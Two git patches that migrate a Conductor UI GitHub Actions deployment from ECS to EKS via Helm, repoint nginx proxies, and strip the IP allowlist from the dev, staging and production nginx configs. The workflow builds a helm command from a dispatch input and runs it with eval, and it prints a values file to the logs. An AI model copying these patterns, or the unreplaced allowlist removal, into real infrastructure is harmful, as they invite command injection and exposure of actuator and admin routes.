From 30f94d8343036e3e0df983673b579f80b462fed5 Mon Sep 17 00:00:00 2001
From: Gayathridevi S <gayathridevi.s@keyvalue.systems>
Date: Tue, 18 Mar 2025 16:27:08 +0530
Subject: [PATCH 1/2] changed ci cd pipeline for conductor ui

---
 .github/workflows/cd-ui.yaml | 99 ++++++++++++++++--------------------
 ui/default-dev.conf          |  6 +--
 ui/default-prd.conf          |  6 +--
 ui/default-stg.conf          |  6 +--
 4 files changed, 54 insertions(+), 63 deletions(-)

diff --git a/.github/workflows/cd-ui.yaml b/.github/workflows/cd-ui.yaml
index 3609423632..29b6861b76 100644
--- a/.github/workflows/cd-ui.yaml
+++ b/.github/workflows/cd-ui.yaml
@@ -15,10 +15,15 @@ on:
         required: true
         type: string
         description: Provide tag (Eg:v3.14.0)
-
+permissions:
+  id-token: write
+  contents: write
+  packages: read
+  actions: read
 env:
   SERVICE_NAME: conductor-ui
   AWS_REGION: "ap-south-1"
+  HELM_CHART_NAME: "application-helm-chart"
 
 jobs:
   prepare-env:
@@ -29,13 +34,12 @@ jobs:
       AWS_ROLE: ${{ steps.vars.outputs.AWS_ROLE }}
       ENV: ${{ steps.vars.outputs.ENV }}
       PROJECT_PREFIX: ${{ steps.vars.outputs.PROJECT_PREFIX }}
-      ECS_CLUSTER: ${{ steps.set_env.outputs.ECS_CLUSTER }}
-      ECS_SERVICE: ${{ steps.set_env.outputs.ECS_SERVICE }}
-      TASK_DEFINITION: ${{ steps.set_env.outputs.TASK_DEFINITION }}
-      CONTAINER_NAME: ${{ steps.set_env.outputs.CONTAINER_NAME }}
+      K8S_CLUSTER: ${{ steps.set_env.outputs.K8S_CLUSTER }}
       ECR_REPOSITORY: ${{ steps.set_env.outputs.ECR_REPOSITORY }}
+      ENVIRONMENT_BUCKET: ${{ steps.set_env.outputs.ENVIRONMENT_BUCKET }}
       SLACK_WEBHOOK_URL: ${{ steps.vars.outputs.SLACK_WEBHOOK_URL }}
-      
+      AWS_ACCOUNT_ID: ${{ steps.vars.outputs.AWS_ACCOUNT_ID}}
+
     steps:
       - id: vars
         shell: bash
@@ -44,7 +48,7 @@ jobs:
           ENV=${{ github.event.inputs.environment }}
           IMAGE_TAG=${{ github.event.inputs.tag }}
           echo $BRANCH
-          
+
           if [ -z "$ENV" ]
           then
             case $BRANCH in
@@ -67,16 +71,19 @@ jobs:
             echo "AWS_ROLE=PRD_AWS_ROLE" >> $GITHUB_OUTPUT
             echo "PROJECT_PREFIX=sirn-prd-mb" >> $GITHUB_OUTPUT
             echo "SLACK_WEBHOOK_URL=PRD_SLACK_WEBHOOK_URL" >> $GITHUB_OUTPUT   
+            echo "AWS_ACCOUNT_ID=PRD_AWS_ACCOUNT_ID" >> $GITHUB_OUTPUT
           elif [ $ENV == 'stg' ]
           then
             echo "AWS_ROLE=STG_AWS_ROLE" >> $GITHUB_OUTPUT
             echo "PROJECT_PREFIX=sirn-stg-mb" >> $GITHUB_OUTPUT
             echo "SLACK_WEBHOOK_URL=DEV_SLACK_WEBHOOK_URL" >> $GITHUB_OUTPUT  
+            echo "AWS_ACCOUNT_ID=NON_PRD_AWS_ACCOUNT_ID" >> $GITHUB_OUTPUT 
           elif [ $ENV == 'dev' ]
           then
             echo "AWS_ROLE=DEV_AWS_ROLE" >> $GITHUB_OUTPUT
             echo "PROJECT_PREFIX=sirn-dev-mb" >> $GITHUB_OUTPUT
             echo "SLACK_WEBHOOK_URL=DEV_SLACK_WEBHOOK_URL" >> $GITHUB_OUTPUT
+            echo "AWS_ACCOUNT_ID=NON_PRD_AWS_ACCOUNT_ID" >> $GITHUB_OUTPUT
           else
             echo "Branch not configured!"
             exit 1
@@ -88,34 +95,27 @@ jobs:
         id: set_env
         run: |
           PROJECT_PREFIX=${{ steps.vars.outputs.PROJECT_PREFIX }}
-          echo "ECR_REPOSITORY=$PROJECT_PREFIX-ecr-$SERVICE_NAME"  >> $GITHUB_OUTPUT
-          echo "ECS_CLUSTER=$PROJECT_PREFIX-ecs-cluster"  >> $GITHUB_OUTPUT
-          echo "ECS_SERVICE=$PROJECT_PREFIX-svc-$SERVICE_NAME"  >> $GITHUB_OUTPUT
-          echo "TASK_DEFINITION=$PROJECT_PREFIX-td-$SERVICE_NAME"  >> $GITHUB_OUTPUT
-          echo "CONTAINER_NAME=$PROJECT_PREFIX-cntr-$SERVICE_NAME"  >> $GITHUB_OUTPUT
+          echo "K8S_CLUSTER=$PROJECT_PREFIX-prime"  >> $GITHUB_OUTPUT
+          echo "ENVIRONMENT_BUCKET=$PROJECT_PREFIX-s3-environment"  >> $GITHUB_OUTPUT
           echo ":seedling: Branch:${GITHUB_REF#refs/heads/}" >> $GITHUB_STEP_SUMMARY
-          
+          echo "ECR_REPOSITORY=$PROJECT_PREFIX-ecr-conductor-ui"  >> $GITHUB_OUTPUT
+
   # Deploy Conductor UI Image to ECS
-  deploy-ui-image:
-    name: Deploy UI Image
-    runs-on: 'ubuntu-latest'
-    timeout-minutes: 20
+  deploy-to-k8s:
+    name: Deploy to k8s
+    runs-on: ubuntu-latest
+    container:
+      image: public.ecr.aws/kvsiren-dev/pipeline/helm-deploy:latest
+    timeout-minutes: 15
     permissions:
       id-token: write
       pull-requests: write
       contents: read
-    needs: prepare-env
+    needs:
+      - prepare-env
     env:
-      AWS_ROLE: ${{ needs.prepare-env.outputs.AWS_ROLE }}
-      ENV: ${{ needs.prepare-env.outputs.ENV }}
-      PROJECT_PREFIX: ${{needs.prepare-env.outputs.PROJECT_PREFIX}}
-      ECR_REPOSITORY: ${{needs.prepare-env.outputs.ECR_REPOSITORY}}
-      IMAGE_TAG: ${{ github.event.inputs.tag }}
-      ECS_CLUSTER: ${{ needs.prepare-env.outputs.ECS_CLUSTER }}
-      ECS_SERVICE: ${{ needs.prepare-env.outputs.ECS_SERVICE }}
-      TASK_DEFINITION: ${{ needs.prepare-env.outputs.TASK_DEFINITION }}
-      CONTAINER_NAME: ${{ needs.prepare-env.outputs.CONTAINER_NAME }}
-      
+      AWS_ACCOUNT_ID: ${{ needs.prepare-env.outputs.AWS_ACCOUNT_ID }}
+      ECR_REPOSITORY: ${{ needs.prepare-env.outputs.ECR_REPOSITORY }}
     steps:
       - name: Checkout code from action
         uses: actions/checkout@v2
@@ -123,33 +123,24 @@ jobs:
       - name: Configure AWS credentials
         uses: aws-actions/configure-aws-credentials@v4
         with:
-          role-to-assume: ${{ secrets[env.AWS_ROLE] }}
+          role-to-assume: arn:aws:iam::${{ vars[env.AWS_ACCOUNT_ID] }}:role/github-actions
           aws-region: ${{ env.AWS_REGION }}
 
-      - name: Amazon ECR Login
-        id: login-ecr
-        uses: aws-actions/amazon-ecr-login@v1.7.0
+      - name: Deploy to Kubernetes
+        shell: bash
+        run: |
+          aws eks update-kubeconfig --name ${{ needs.prepare-env.outputs.K8S_CLUSTER }}
+          aws s3 cp s3://${{ needs.prepare-env.outputs.ENVIRONMENT_BUCKET }}/helm/${{ env.SERVICE_NAME }}/values.yaml ./values.yaml 
+          cat ./values.yaml
+          aws ecr get-login-password --region ${{ env.AWS_REGION }} | helm registry login --username AWS --password-stdin ${{ vars[env.AWS_ACCOUNT_ID] }}.dkr.ecr.${{ env.AWS_REGION }}.amazonaws.com
 
-      - name: Check if image tag exists in ECR
-        id: check-image-existence
-        run: |          
-          if aws ecr describe-images --repository-name "${{ env.ECR_REPOSITORY }}" --region "${{ env.AWS_REGION }}" --image-ids imageTag="${{ env.IMAGE_TAG }}" 2>&1 | grep -q "imageTag"; then
-            echo "Image tag $IMAGE_TAG exists in ECR"
-          else
-            echo "Error: Image tag $IMAGE_TAG does not exist in ECR"
-            exit 1
-          fi
+          # Construct base Helm command
+          HELM_CMD="helm upgrade --install ${{ env.SERVICE_NAME }} oci://${{ vars[env.AWS_ACCOUNT_ID] }}.dkr.ecr.${{ env.AWS_REGION }}.amazonaws.com/${{ env.HELM_CHART_NAME }} \
+            --namespace ${{ needs.prepare-env.outputs.ENV }} \
+            --values values.yaml \
+            --set default.image.repository='${{ vars[env.AWS_ACCOUNT_ID] }}.dkr.ecr.${{ env.AWS_REGION }}.amazonaws.com/${{ env.ECR_REPOSITORY }}' \
+            --set default.image.tag='${{ github.event.inputs.tag }}'"
 
-      - name: Deploy backend
-        id: deploy_backend
-        uses: ./.github/actions/deploy-ecs
-        env:
-          APP_IMAGE: ${{ steps.login-ecr.outputs.registry }}/${{ env.ECR_REPOSITORY }}:${{ env.IMAGE_TAG }}
-        with:
-         aws-region : ${{ env.AWS_REGION }}
-         aws-role: ${{ secrets[env.AWS_ROLE] }}
-         task-definition: ${{ env.TASK_DEFINITION }}
-         container-name: ${{ env.CONTAINER_NAME }}
-         ecs-service: ${{ env.ECS_SERVICE }}
-         ecs-cluster: ${{ env.ECS_CLUSTER }}
-         image: ${{ env.APP_IMAGE }}
\ No newline at end of file
+          # Run the Helm command
+          echo "Running: $HELM_CMD"
+          eval $HELM_CMD
diff --git a/ui/default-dev.conf b/ui/default-dev.conf
index f37c665194..7369e2f3bb 100644
--- a/ui/default-dev.conf
+++ b/ui/default-dev.conf
@@ -32,7 +32,7 @@ server {
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
     proxy_set_header X-NginX-Proxy true;
-    proxy_pass http://sirn-dev-mb-svc-conductor-server.sirn-dev-mb.local:8080/api;
+    proxy_pass http://conductor.dev.svc.cluster.local:8080/api;
     proxy_ssl_session_reuse off;
     proxy_set_header Host $http_host;
     proxy_cache_bypass $http_upgrade;
@@ -43,7 +43,7 @@ server {
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
     proxy_set_header X-NginX-Proxy true;
-    proxy_pass http://sirn-dev-mb-svc-conductor-server.sirn-dev-mb.local:8080/actuator;
+    proxy_pass http://conductor.dev.svc.cluster.local:8080/actuator;
     proxy_ssl_session_reuse off;
     proxy_set_header Host $http_host;
     proxy_cache_bypass $http_upgrade;
@@ -54,7 +54,7 @@ server {
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
     proxy_set_header X-NginX-Proxy true;
-    proxy_pass http://sirn-dev-mb-svc-conductor-server.sirn-dev-mb.local:8080/swagger-ui;
+    proxy_pass http://conductor.dev.svc.cluster.local:8080/swagger-ui;
     proxy_ssl_session_reuse off;
     proxy_set_header Host $http_host;
     proxy_cache_bypass $http_upgrade;
diff --git a/ui/default-prd.conf b/ui/default-prd.conf
index bd2c370c57..8ac3ff74fa 100644
--- a/ui/default-prd.conf
+++ b/ui/default-prd.conf
@@ -32,7 +32,7 @@ server {
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
     proxy_set_header X-NginX-Proxy true;
-    proxy_pass http://sirn-prd-mb-svc-conductor-server.sirn-prd-mb.local:8080/api;
+    proxy_pass http://conductor.prd.svc.cluster.local:8080/api;
     proxy_ssl_session_reuse off;
     proxy_set_header Host $http_host;
     proxy_cache_bypass $http_upgrade;
@@ -43,7 +43,7 @@ server {
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
     proxy_set_header X-NginX-Proxy true;
-    proxy_pass http://sirn-prd-mb-svc-conductor-server.sirn-prd-mb.local:8080/actuator;
+    proxy_pass http://conductor.prd.svc.cluster.local:8080/actuator;
     proxy_ssl_session_reuse off;
     proxy_set_header Host $http_host;
     proxy_cache_bypass $http_upgrade;
@@ -54,7 +54,7 @@ server {
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
     proxy_set_header X-NginX-Proxy true;
-    proxy_pass http://sirn-prd-mb-svc-conductor-server.sirn-prd-mb.local:8080/swagger-ui;
+    proxy_pass http://conductor.prd.svc.cluster.local:8080/swagger-ui;
     proxy_ssl_session_reuse off;
     proxy_set_header Host $http_host;
     proxy_cache_bypass $http_upgrade;
diff --git a/ui/default-stg.conf b/ui/default-stg.conf
index e057354998..790f159e6f 100644
--- a/ui/default-stg.conf
+++ b/ui/default-stg.conf
@@ -32,7 +32,7 @@ server {
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
     proxy_set_header X-NginX-Proxy true;
-    proxy_pass http://sirn-stg-mb-svc-conductor-server.sirn-stg-mb.local:8080/api;
+    proxy_pass http://conductor.stg.svc.cluster.local:8080/api;
     proxy_ssl_session_reuse off;
     proxy_set_header Host $http_host;
     proxy_cache_bypass $http_upgrade;
@@ -43,7 +43,7 @@ server {
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
     proxy_set_header X-NginX-Proxy true;
-    proxy_pass http://sirn-stg-mb-svc-conductor-server.sirn-stg-mb.local:8080/actuator;
+    proxy_pass http://conductor.stg.svc.cluster.local:8080/actuator;
     proxy_ssl_session_reuse off;
     proxy_set_header Host $http_host;
     proxy_cache_bypass $http_upgrade;
@@ -54,7 +54,7 @@ server {
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
     proxy_set_header X-NginX-Proxy true;
-    proxy_pass http://sirn-stg-mb-svc-conductor-server.sirn-stg-mb.local:8080/swagger-ui;
+    proxy_pass http://conductor.stg.svc.cluster.local:8080/swagger-ui;
     proxy_ssl_session_reuse off;
     proxy_set_header Host $http_host;
     proxy_cache_bypass $http_upgrade;

From 8dea53078722869d5adfe3c0184121e049275b74 Mon Sep 17 00:00:00 2001
From: Gayathridevi S <gayathridevi.s@keyvalue.systems>
Date: Tue, 18 Mar 2025 18:21:05 +0530
Subject: [PATCH 2/2] removed whitelisting of ips from nginx config

---
 ui/default-dev.conf | 12 ------------
 ui/default-prd.conf | 12 ------------
 ui/default-stg.conf | 12 ------------
 3 files changed, 36 deletions(-)

diff --git a/ui/default-dev.conf b/ui/default-dev.conf
index 7369e2f3bb..180f83dee3 100644
--- a/ui/default-dev.conf
+++ b/ui/default-dev.conf
@@ -1,10 +1,3 @@
-map $http_x_forwarded_for $allow {
-    default 0;
-    "103.138.236.18" 1;
-    "103.181.238.106" 1;
-    "103.142.30.151" 1;
-    "61.2.142.186" 1;
-}
 
 server {
   listen 5000;
@@ -12,11 +5,6 @@ server {
   server_tokens off;
 
   location / {
-
-    if ($allow != 1) {
-        return 401;
-    }
-
     add_header Referrer-Policy "strict-origin";
     add_header X-Frame-Options "SAMEORIGIN";
     add_header X-Content-Type-Options "nosniff";
diff --git a/ui/default-prd.conf b/ui/default-prd.conf
index 8ac3ff74fa..256c0cce2c 100644
--- a/ui/default-prd.conf
+++ b/ui/default-prd.conf
@@ -1,10 +1,3 @@
-map $http_x_forwarded_for $allow {
-    default 0;
-    "103.138.236.18" 1;
-    "103.181.238.106" 1;
-    "103.142.30.151" 1;
-    "61.2.142.186" 1;
-}
 
 server {
   listen 5000;
@@ -12,11 +5,6 @@ server {
   server_tokens off;
 
   location / {
-
-    if ($allow != 1) {
-        return 401;
-    }
-
     add_header Referrer-Policy "strict-origin";
     add_header X-Frame-Options "SAMEORIGIN";
     add_header X-Content-Type-Options "nosniff";
diff --git a/ui/default-stg.conf b/ui/default-stg.conf
index 790f159e6f..f88374776e 100644
--- a/ui/default-stg.conf
+++ b/ui/default-stg.conf
@@ -1,10 +1,3 @@
-map $http_x_forwarded_for $allow {
-    default 0;
-    "103.138.236.18" 1;
-    "103.181.238.106" 1;
-    "103.142.30.151" 1;
-    "61.2.142.186" 1;
-}
 
 server {
   listen 5000;
@@ -12,11 +5,6 @@ server {
   server_tokens off;
 
   location / {
-
-    if ($allow != 1) {
-        return 401;
-    }
-
     add_header Referrer-Policy "strict-origin";
     add_header X-Frame-Options "SAMEORIGIN";
     add_header X-Content-Type-Options "nosniff";